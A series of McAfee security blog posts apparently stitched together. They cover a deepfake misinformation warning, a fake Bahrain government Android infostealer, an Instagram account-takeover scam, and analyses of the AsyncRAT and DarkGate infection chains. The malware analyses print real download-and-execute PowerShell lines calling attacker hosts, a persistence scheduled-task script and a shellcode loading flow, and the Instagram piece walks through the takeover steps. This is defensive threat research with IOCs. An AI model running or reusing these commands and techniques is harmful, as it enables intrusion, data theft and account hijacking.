As the prevalence of deepfakes and related scams continues to grow, along with campaigns of misinformation and disinformation, McAfee has developed deepfake audio detection technology. Showcased on Intel’s AI PCs at RSA in May, McAfee’s Deepfake Detector – formerly known as Project Mockingbird – helps people discern truth from fiction and defends consumers against cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures.  

With the 2024 Olympics on the horizon, McAfee predicts a surge in scams involving AI tools. Whether you’re planning to travel to the summer Olympics or just following the excitement from home, it’s crucial to remain alert. Be wary of unsolicited text messages offering deals, steer clear of unfamiliar websites, and be skeptical of the information shared on various social platforms. It’s important to maintain a critical eye and use tools that enhance your online safety. 

McAfee is committed to empowering consumers to make informed decisions by providing tools that identify AI-generated content and raising awareness about their application where necessary. AI generated content is becoming increasingly believable nowadays. Some key recommendations while viewing content online 

1. Be skeptical of content from untrusted sources – Always question the motive. In this case, the content is accessible on Telegram channels and posted to uncommon public cloud storage.  
2. Be vigilant while viewing the content – Most AI fabrications will have some flaws, although it’s becoming increasingly more difficult to spot such discrepancies at glance. In this video, we noted some obvious indicators that appeared to be forged, however it is slightly more complicated with the audio. 
3. Cross-verify information – Any cross-validation of this content based on the title on popular search engines or by searching Amazon Prime content, would very quickly lead consumers to realize that something is amiss. 

Note: McAfee is not affiliated with the Olympics and nothing in this article should be interpreted as indicating or implying one. The purpose of this article is to help build awareness against misinformation campaigns. “Olympics Has Fallen II” is the name of one such campaign discovered by McAfee. 

The post Olympics Has Fallen – A Misinformation Campaign Featuring a Voice Cloned Elon Musk appeared first on McAfee Blog.

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who are deceived by advertisements that they are available on mobile will be provided with the necessary personal information for these services without a doubt. They reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Excluding the most frequently found fake apps pretending LMRA, there are various fake apps included Bank of Bahrain and Kuwait (BBK), BenefitPay, a fintech company in Bahrain, and even apps pretending to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the type of app that this malware pretends, we can guess that the purpose is financial fraud to use the personal information it has stolen. Moreover, someone has been affected by this campaign as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. Facebook pages are fake and malware author is constantly creating new pages. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages are sent to trick users into clicking a link so that they feel the need to urgently confirm.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, the app shows a large legitimate icon for users to be mistaken. And it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it is simply a button to send information to the C2 server. If users input their information, it goes directly to the next screen without verification. This step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information inputted so far will be sent to the malware author’s c2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.

Figure 11. Completion page to trick users

In addition, they have a payload for stealing SMS. This app has a receiver that works when SMS is received. So as soon as SMS comes, it sends an SMS message to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

For apps that use Firebase, dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, it is possible to respond quickly to maintain already installed victims by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview

Conclusion

According to our detection telemetry data, there are 62 users have already used this app in Bahrain. However, since this data is a number at the time of writing, this number is expected to continue to increase, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than widespread attacks. These attacks may be difficult for general users to distinguish because malware accurately uses the parts needed by users living in a specific country. So we recommend users install secure software to protect their devices. Also, users are encouraged to download and use apps from official app stores like Google Play Store or Apple AppStore. If you can’t find an app in these stores, you must download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256	Package Name	App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c	com.ariashirazi.instabrowser	LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d	com.npra.bahrain.five	LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb	com.npra.bahrain.five	LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a	com.lmra.nine.lmranine	LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730	com.stich.inches	Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba	com.ariashirazi.instabrowser	EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819	com.ariashirazi.instabrowser	BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44	com.ariashirazi.instabrowser	BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546	com.lymors.lulumoney	BBK Loan App

Domains:

• https[://]lmraa.com
• https[://]lmjbfv.site
• https[://]dbjiud.site
• https[://]a.jobshuntt.com
• https[://]shop.wecarerelief.ca

Firebase(for C2):

• https[://]npra-5.firebaseio.com
• https[://]lmra9-38b17.firebaseio.com
• https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

How Scammers Hijack Your Instagram

Authored by Vignesh Dhatchanamoorthy, Rachana S

Instagram, with its vast user base and dynamic platform, has become a hotbed for scams and fraudulent activities. From phishing attempts to fake giveaways, scammers employ a range of tactics to exploit user trust and vulnerability. These scams often prey on people’s desire for social validation, financial gain, or exclusive opportunities, luring them into traps that can compromise their personal accounts and identity.

McAfee has observed a concerning scam emerging on Instagram, where scammers are exploiting the platform’s influencer program to deceive users. This manipulation of the influencer ecosystem underscores the adaptability and cunning of online fraudsters in their pursuit of ill-gotten gains.

Brand Ambassador and influencer program scams:

The Instagram influencer program, designed to empower content creators and influencers by providing opportunities for collaboration and brand partnerships, has inadvertently become a target for exploitation. Scammers are leveraging the allure of influencer status to lure unsuspecting individuals into fraudulent schemes, promising fame, fortune, and exclusive opportunities in exchange for participation.

The first step involves a cybercrook creating a dummy account and using it to hack into a target’s Instagram account. Using those hacked accounts hackers then share posts about Bitcoin and other cryptocurrencies. Finally, the hacked accounts are used to scam target friends with a request that they vote for them to win an influencer contest.

After this series of steps is complete, the scammer will first identify the target and then send them a link with a Gmail email address to vote in their favor.

Fig 1: Scammer Message

While the link in the voting request message likely leads to a legitimate Instagram page, victims are often directed to an Instagram email update page upon clicking — not the promised voting page.  Also, since the account sending the voting request is likely familiar to the scam target, they are more likely to enter the scammer’s email ID without examining it closely.

During our research, we saw scammers like Instagram’s accounts center link to their targets like below hxxp[.]//accountscenter.instagram.com/personal_info/contact_points/contact_point_type=email&dialog_type=add_contact_point

Fig 2. Email Updating Page

We took this opportunity to gain more insight into the details of how these deceptive tactics are carried out, creating an email account (scammerxxxx.com and victimxxxx.com) and a dummy Instagram account using that email (victimxxxx.com) for testing purposes.

Fig 3. Victim’s Personal Details

We visited the URL provided in the chat and entered our testing email ID scammerxxxx.com instead of entering the email address provided by the scammer, which was “vvote8399@gmail.com”

Fig 4. Adding Scammer’s Email Address in Victim Account

After adding the scammerxxxx.com address in the email address field, we received a notification stating, “Adding this email will replace vitimxxxx.com on this Instagram account”.

This is the point at which a scam target will fall victim to this type of scam if they are not aware that they are giving someone else, with access to the scammerxxxx.com email address, control of their Instagram account.

After selecting Next, we were redirected to the confirmation code page. Here, scammers will send the confirmation code received in their email account and provide that code to victims, via an additional Instagram message, to complete the email updating process.

In our testing case, the verification code was sent to the email address scammerxxxx.com.

Fig 5. Confirmation Code Page

We received the verification code in our scammerxxxx.com account and submitted it on the confirmation code page.

Fig 6. Confirmation Code Mail

Once the ‘Add an Email Address’ procedure is completed, the scammer’s email address is linked to the victim’s Instagram account. As a result, the actual user will be unable to log in to their account due to the updated email address.

Fig 7. Victim’s Profile after updating Scammer’s email

Because the scammer’s email address (scammerxxxx.com) was updated the account owner — the scam victim will not be able to access their account and will instead receive the message “Sorry, your password was incorrect. Please double-check your password.”

Fig 8. Victim trying to login to their account.

The scammer will now change the victim’s account password by using the “forgot password” function with the new, scammer email login ID.

Fig 9. Forgot Password Page

 

The password reset code will be sent to the scammer’s email address (scammerxxxx.com).

Fig 10. Reset the Password token received in the Scammer’s email

After getting the email, the scammer will “Reset your password” for the victim’s account.

Fig 11. Scammer Resetting the Password

After resetting the password, the scammer can take over the victim’s Instagram account.

Fig 12. The scammer took over the victim’s Instagram account.

To protect yourself from Instagram scams:

• Be cautious of contests, polls, or surveys that seem too good to be true or request sensitive information.
• Verify the legitimacy of contests or giveaways by checking the account’s authenticity, looking for official rules or terms, and researching the organizer.
• Avoid clicking on suspicious links or providing personal information to unknown sources.
• Enable two-factor authentication (2FA) on your Instagram account to add an extra layer of security.
• Report suspicious activity or accounts to Instagram for investigation.
• If any of your friends ask you to help them, contact them via text message or phone call, to ensure that their account has not been hacked first.

The post How Scammers Hijack Your Instagram appeared first on McAfee Blog.

From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats

Authored by Yashvi Shah and Preksha Saxena

AsyncRAT, also known as “Asynchronous Remote Access Trojan,” represents a highly sophisticated malware variant meticulously crafted to breach computer systems security and steal confidential data. McAfee Labs has recently uncovered a novel infection chain, shedding light on its potent lethality and the various security bypass mechanisms it employs.

It utilizes a variety of file types, such as PowerShell, Windows Script File (WSF), VBScript (VBS), and others within a malicious HTML file. This multifaceted approach aims to circumvent antivirus detection methods and facilitate the distribution of infection.

Figure 1: AsyncRAT prevalence for the last one month

Infection Chain:

The infection initiates through a spam email containing an HTML page attachment. Upon unwittingly opening the HTML page, an automatic download of a Windows Script File (WSF) ensues. This WSF file is deliberately named in a manner suggestive of an Order ID, fostering the illusion of legitimacy and enticing the user to execute it. Subsequent to the execution of the WSF file, the infection progresses autonomously, necessitating no further user intervention. The subsequent stages of the infection chain encompass the deployment of Visual Basic Script (VBS), JavaScript (JS), Batch (BAT), Text (TXT), and PowerShell (PS1) files. Ultimately, the chain culminates in a process injection targeting aspnet_compiler.exe.

Figure 2: Infection Chain

Technical Analysis

Upon opening a spam email, the recipient unwittingly encounters a web link embedded within its contents. Upon clicking on the link, it triggers the opening of an HTML page. Simultaneously, the page initiates the download of a WSF (Windows Script File), setting into motion a potentially perilous sequence of events.

Figure 3:HTML page

The HTML file initiates the download of a WSF file. Disguised as an order-related document with numerous blank lines, the WSF file conceals malicious intent.  After its execution, no user interaction is required.

On executing wsf, we get the following process tree:

Figure 4: Process tree

Commandlines:

Upon investigation, we discovered the presence of code lines in wsf file that facilitate the download of another text file.

Figure 5:Content of wsf file

The downloaded text file, named “1.txt,” contains specific lines of code. These lines are programmed to download another file, referred to as “r.jpg,” but it is actually saved in the public folder under the name “ty.zip.” Subsequently, this zip file is extracted within the same public folder, resulting in the creation of multiple files.

Figure 6: Marked files are extracted in a public folder

Infection sequence:

a) The “ty.zip” file comprises 17 additional files. Among these, the file named “basta.js” is the first to be executed. The content of “basta.js” is as follows:

Figure 7: basta.js

b) “basta.js” invoked “node.bat” file from the same folder.

Figure 8: node.js

Explaining the command present in node.bat:

• $tr = New-Object -ComObject Schedule.Service;
  • This creates a new instance of the Windows Task Scheduler COM object.
• $tr.Connect();
  • This connects to the Task Scheduler service.
• $ta = $tr.NewTask(0);
  • This creates a new task object.
• $ta.RegistrationInfo.Description = ‘Runs a script every 2 minutes’;
  • This sets the description of the task.
• $ta.Settings.Enabled = $true;
  • This enables the task.
• $ta.Settings.DisallowStartIfOnBatteries = $false;
  • This allows the task to start even if the system is on battery power.
• $st = $ta.Triggers.Create(1);
  • This creates a trigger for the task. The value 1 corresponds to a trigger type of “Daily”.
• $st.StartBoundary = [DateTime]::Now.ToString(‘yyyy-MM-ddTHH:mm:ss’);
  • This sets the start time for the trigger to the current time.
• $st.Repetition.Interval = ‘PT2M’;
  • This sets the repetition interval for the trigger to 2 minutes.
• $md = $ta.Actions.Create(0);
  • This creates an action for the task. The value 0 corresponds to an action type of “Execute”.
• $md.Path = ‘C:\Users\Public\app.js’;
  • This sets the path of the script to be executed by the task.
• $ns = $tr.GetFolder(‘\’);
  • This gets the root folder of the Task Scheduler.
• $ns.RegisterTaskDefinition(‘cafee’, $ta, 6, $null, $null, 3);
  • This registers the task definition with the Task Scheduler. The task is named “cafee”. The parameters 6 and 3 correspond to constants for updating an existing task and allowing the task to be run on demand, respectively.

To summarize, the command sets up a scheduled task called “cafee” which is designed to execute the “app.js” script found in the C:\Users\Public\ directory every 2 minutes. The primary purpose of this script is to maintain persistence on the system.

Figure 9: Schedule task entry

c) Now “app.js” is executed and it executes “t.bat” from the same folder.

Figure 10:app.js

d) “t.bat” has little obfuscated code which after concatenating becomes: “Powershell.exe -ExecutionPolicy Bypass -File “”C:\Users\Public\t.ps1”

Figure 11: Content of t.bat

e) Now the powershell script “t.ps1” is invoked. This is the main script that is responsible for injection.

Figure 12: Content of t.ps1

There are 2 functions defined in it:

A) function fun_alosh()
This function is used in the last for decoding $tLx and $Uk

B) Function FH ()
This function is used only once to decode the content of “C:\\Users\\Public\\Framework.txt”. This function takes a binary string as input, converts it into a sequence of ASCII characters, and returns the resulting string.

Figure 13: Content of Framework.txt

After decoding the contents of “C:\Users\Public\Framework.txt” using CyberChef, we are able to reveal the name of the final binary file targeted for injection.

Figure 14: Binary to Hex, Hex to Ascii Conversion using CyberChef

This technique aims to evade detection by concealing suspicious keywords within the script. Same way other keywords are also stored in txt files, such as:

Content of other text files are:

Figure 15: Content of other files

After replacing all the names and reframing sentences. Below is the result.

Figure 16: Injection code

Now, the two variables left are decrypted by fun_alosh.

After decrypting and saving them, it was discovered that both files are PE files, with one being a DLL ($tLx) and the other an exe ($Uk).

Figure 17: Decoded binaries

Process injection in aspnet_compiler.exe.

Figure 18:  Process injection in aspnet_compiler.exe

Once all background tasks are finished, a deceptive Amazon page emerges solely to entice the user.

Figure 19: Fake Amazon page

Analysis of Binaries:

The Dll file is packed with confuserEX and as shown, the type is mentioned ‘NewPE2.PE’ and Method is mentioned ‘Execute’.

Figure 20: Confuser packed DLL

The second file is named AsyncClient123 which is highly obfuscated.

Figure 21: AsyncRat payload

To summarize the main execution flow of “AsyncRAT”, we can outline the following steps:

• Initialize its configuration (decrypts the strings).
• Verifies and creates a Mutex (to avoid running duplicated instances).
• If configured through the settings, the program will automatically exit upon detecting a virtualized or analysis environment.
• Establishes persistence in the system.
• Collect data from the victim’s machine.
• Establish a connection with the server.

The decrypting function is used to decrypt strings.

Figure 22: Decrypting Function

The program creates a mutex to prevent multiple instances from running simultaneously.

Figure 23: Creating Mutex

Figure 24: Mutex in process explorer

Checking the presence of a debugger.

Figure 25: Anti analysis code

Collecting data from the system.

Figure 26: Code for collecting data from system

Establish a connection with the server.

Figure 27: Code for C2 connection

Process injection in aspnet_compiler.exe:

Figure 28: C2 communication

Conclusion:

In this blog post, we dissect the entire attack sequence of AsyncRAT, beginning with an HTML file that triggers the download of a WSF file, and culminating in the injection of the final payload. Such tactics are frequently employed by attackers to gain an initial foothold. We anticipate a rise in the utilization of these file types following Microsoft’s implementation of protections against malicious Microsoft Office macros, which have also been widely exploited for malware delivery. McAfee labs consistently advise users to refrain from opening files from unknown sources, particularly those received via email. For organizations, we highly recommend conducting security training for employees and implementing a secure web gateway equipped with advanced threat protection. This setup enables real-time scanning and detection of malicious files, enhancing organizational security.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date
• Use the latest and patched version of Acrobat reader

IOCs (Indicators of compromise):

File	SHA256
HTML	969c50f319a591b79037ca50cda55a1bcf2c4284e6ea090a68210039034211db
WSF	ec6805562419e16de9609e2a210464d58801c8b8be964f876cf062e4ab52681a
ty.zip	daee41645adcf22576def12cb42576a07ed5f181a71d3f241c2c14271aad308b
basta.js	909ec84dfa3f2a00431a20d4b8a241f2959cac2ea402692fd46f4b7dbf247e90
node.bat	569e33818e6af315b5f290442f9e27dc6c56a25259d9c9866b2ffb4176d07103
app.js	7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81
t.bat	e2d30095e7825589c3ebd198f31e4c24e213d9f43fc3bb1ab2cf06b70c6eac1d
t.ps1	a0c40aa214cb28caaf1a2f5db136bb079780f05cba50e84bbaeed101f0de7fb3
exe	0d6bc7db43872fc4d012124447d3d050b123200b720d305324ec7631f739d98d
dll	b46cd34f7a2d3db257343501fe47bdab67e796700f150b8c51a28bb30650c28f
URL	hxxp://142.202.240[.]40:222/1.txt
URL	hxxp://142.202.240[.]40:222/r.jpg

 

The post From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats appeared first on McAfee Blog.

The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen

Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena

McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:

Figure 1: Geo-Distribution of DarkGate

DarkGate’s attempt to bypass Defender Smartscreen

Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.

In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about “Internet Shortcut Files Security Feature Bypass Vulnerability”.

Infection Chain

McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:

Figure 2: Infection Chain

Infection from HTML:

The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.

Figure 3: HTML page

Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.

Figure 4: Prompt confirming redirection to Windows Explorer

Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.

Figure 5: Share Internet Shortcut via SMB

In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.

Figure 6: Javascript in HTML code

On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:

Figure 7: WebDAV share

The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.

Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.

The file is an Internet Shortcut (.url) file, containing the following content:

Figure 8: content of .URL file

The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.

Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.

The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.

If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:

Figure 9: SmartScreen prompt

On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:

Figure 10: Process tree

Following are the command lines:

• “C:\Windows\System32\WScript.exe” “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”
  • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
    • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    • “C:\rjtu\AutoHotkey.exe” C:/rjtu/script.ahk
    • “C:\Windows\system32\attrib.exe” +h C:/rjtu/

The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).

Inspecting the URL “withupdate.com/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:

Figure 11: Remote Script on the C2

This URL leads to a script:

Figure 12: Remote Script contentReformatting, we get:

Figure 13: Remote script content

Explanation of the script:

• ni ‘C:/rjtu/’ -Type Directory -Force: This command creates a new directory named “rjtu” in the root of the C drive if it doesn’t already exist.
• cd ‘C:/rjtu/’: This changes the current directory to the newly created “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/oudowibspr” -OutFile ‘C:/rjtu/temp_AutoHotkey.exe’: This command downloads a file from the specified URL and saves it as “temp_AutoHotkey.exe” in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/rwlwiwbv” -OutFile ‘C:/rjtu/script.ahk’: This downloads a file named “script.ahk” from another specified URL and saves it in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/bisglrkb” -OutFile ‘C:/rjtu/test.txt’: This downloads a file named “test.txt” from yet another specified URL and saves it in the “rjtu” directory.
• start ‘C:/rjtu/AutoHotkey.exe’ -a ‘C:/rjtu/script.ahk’: This command starts the executable “AutoHotkey.exe” located in the “rjtu” directory and passes “script.ahk” file as an argument.
• attrib +h ‘C:/rjtu/’: This sets the hidden attribute for the “rjtu” directory.

Checking “C:/rjtu”:

Figure 14: Dropped folder

AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.

To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).

Following is the ahk script file content:

Figure 15: Content of .ahk script

There are a lot of comments added in the script, simplifying the script, we get:

Figure 16: .ahk script after removing junk

This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.

Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:

Figure 17: Content of test.txt

We analyzed the memory in use for Autohotkey.exe.

Figure 18: Memory of running instance of AutoHotKey.exeWe dumped the memory associated with it and found that it was the same as the content in test.txt.

Figure 19: Memory dump of running AutoHotKey.exe same as test.txt

This is the shellcode present here.  The first 6 bytes are assembly instructions:

Figure 20: Shellcode A in the beginning

Following the jump instructions of 3bf bytes, we reach the same set of instructions again:

Figure 21: Same Shellcode A after jump

This means another jump with be taken for another 3bf bytes:

Figure 22: Same Shellcode A one more time

We have encountered same set of instructions again, taking another jump we reach to:

Figure 23: New Shellcode B found next.

These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.

Figure 24: Shellcode B followed by PE file highlighted

This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:

Figure 25: After debugging found next Shellcode C

This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.

Figure 26: Shellcode C directing to entry point of the PE file

Upon debugging this code, we figured out that in marked “call eax” instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.

This is the final DarkGate payload which is a Delphi-compiled executable file:

Figure 27: Darkgate payload.

Upon this, we see all the network activity happening to C2 site:

Figure 28: Network Communication

Figure 29: C2 IP address

The exfiltration is done to the IP address 5.252.177.207.

Persistence:

For maintaining persistence, a .lnk file is dropped in startup folder:

Figure 30: Persistence

Content of lnk file:

Figure 31: Content of .lnk used for persistence

The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.

Figure 32: Folder dropped in “C:\ProgramData”

Inside this folder, all the same files are present:

Figure 33: Same set of files present in dropped folder

Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.

Infection from XLS:

The malicious excel file asks the user to click on “Open” to view the content properly.

Figure 34: XLS sample

Upon clicking on “Open” button, user gets the following prompt warning the user before opening the file.

Figure 35: XLS files trying to download and run VBS file

For our analysis, we allowed the activity by clicking on “OK”. Following this we got the process tree as:

Figure 36: Process tree from Excel file

The command lines are:

• “C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\admin\Documents\Cluster\10-apr-xls\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
  • “C:\Windows\System32\WScript.exe” “\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\kady\AutoHotkey.exe” C:/kady/script.ahk
      • “C:\Windows\system32\attrib.exe” +h C:/kady/

The file it gets from “103.124.106[.]237/wctaehcw” has the following content:

Figure 37: Remote script simliar to previous chain

From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.

Mitigation:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date

Indicators of Compromise (IoCs):

File	Hash
Html file	196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
